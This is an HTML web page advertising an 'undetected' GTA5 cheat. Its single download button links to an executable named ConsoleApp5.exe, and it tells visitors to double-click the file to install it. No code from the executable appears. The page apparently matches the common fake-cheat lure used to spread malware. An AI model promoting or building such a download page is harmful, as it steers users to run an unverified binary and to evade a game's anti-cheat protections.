<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>GTA5 Cheat Undetected 2024</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f0f0f0;
        }

        header {
            background-color: #333;
            color: #fff;
            padding: 20px;
            text-align: center;
        }

        nav {
            background-color: #444;
            padding: 10px;
        }

        nav ul {
            list-style-type: none;
            margin: 0;
            padding: 0;
            text-align: center;
        }

        nav ul li {
            display: inline;
            margin-right: 20px;
        }

        nav ul li a {
            color: #fff;
            text-decoration: none;
        }

        section {
            padding: 20px;
            text-align: center;
        }

        .download-button {
            display: inline-block;
            background-color: #f44336;
            color: #fff;
            text-align: center;
            padding: 15px 30px;
            border-radius: 10px;
            text-decoration: none;
            font-weight: bold;
            font-size: 24px;
            transition: background-color 0.3s ease;
        }

        .download-button:hover {
            background-color: #d32f2f;
        }

        footer {
            background-color: #333;
            color: #fff;
            text-align: center;
            padding: 20px;
            position: absolute;
            bottom: 0;
            width: 100%;
        }

        .logo {
            display: block;
            margin: 0 auto;
            max-width: 300px;
        }
    </style>
</head>
<body>

<header>
    <h1>GTA5 Cheat Undetected 2024</h1>
</header>

<nav>
    <ul>
        <li><a href="#">Home</a></li>
        <li><a href="#">About</a></li>
        <li><a href="#">Services</a></li>
        <li><a href="#">Contact</a></li>
    </ul>
</nav>

<section>
    <img src="beyaz1.png" alt="GTA5 Cheat Undetected 2024" class="logo">
    <p>Welcome to the ultimate source for GTA5 cheats! Click the button below to download the cheat tool.</p>
    <a href="ConsoleApp5.exe" class="download-button" download>Download Now</a>
    <p>After the download is complete, locate the downloaded file and double-click it to install the cheat tool.</p>
</section>




<footer>
    <p>&copy; 2024 GTA5 Cheat Undetected. All Rights Reserved.</p>
</footer>

</body>
</html>
